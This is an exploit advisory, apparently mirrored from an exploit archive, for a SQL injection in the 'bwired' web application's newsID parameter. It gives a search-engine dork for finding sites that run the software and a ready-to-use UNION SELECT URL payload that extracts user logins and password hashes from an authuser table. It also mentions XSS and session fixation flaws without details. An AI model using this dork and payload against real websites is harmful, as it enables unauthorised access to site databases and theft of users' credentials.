Lucene search
G00n1337DAY-ID-2044HistoryJul 22, 2007 - 12:00 a.m.
bwired (index.php newsID) Remote SQL Injection Vulnerability
2007-07-2200:00:00
g00n
0day.today
109
Exploit for unknown platform in category web applications
============================================================
bwired (index.php newsID) Remote SQL Injection Vulnerability
============================================================
###############################################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
###############################################################################################
#Program Title ################################################################################
#bwired - Remote SQL Injection
#
#Note #######################################################################################
#There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
#The admin hash will be the same for all the sites I believe. Seeing all the sites are managed by the creator of the webapp.
#Script Website ##############################################################################
#http://web.bwired.com.au
#
#d0rk ######################################################################################
#"Powered by bwired" inurl:?newsID=
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtobwired]/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, fish, milf, ScUzZ, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen,
#fish, rey, canuck, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, fury,
#<S>, Bernard and everyone else at g00ns.net
###############################################################################################
# 0day.today [2018-04-13] #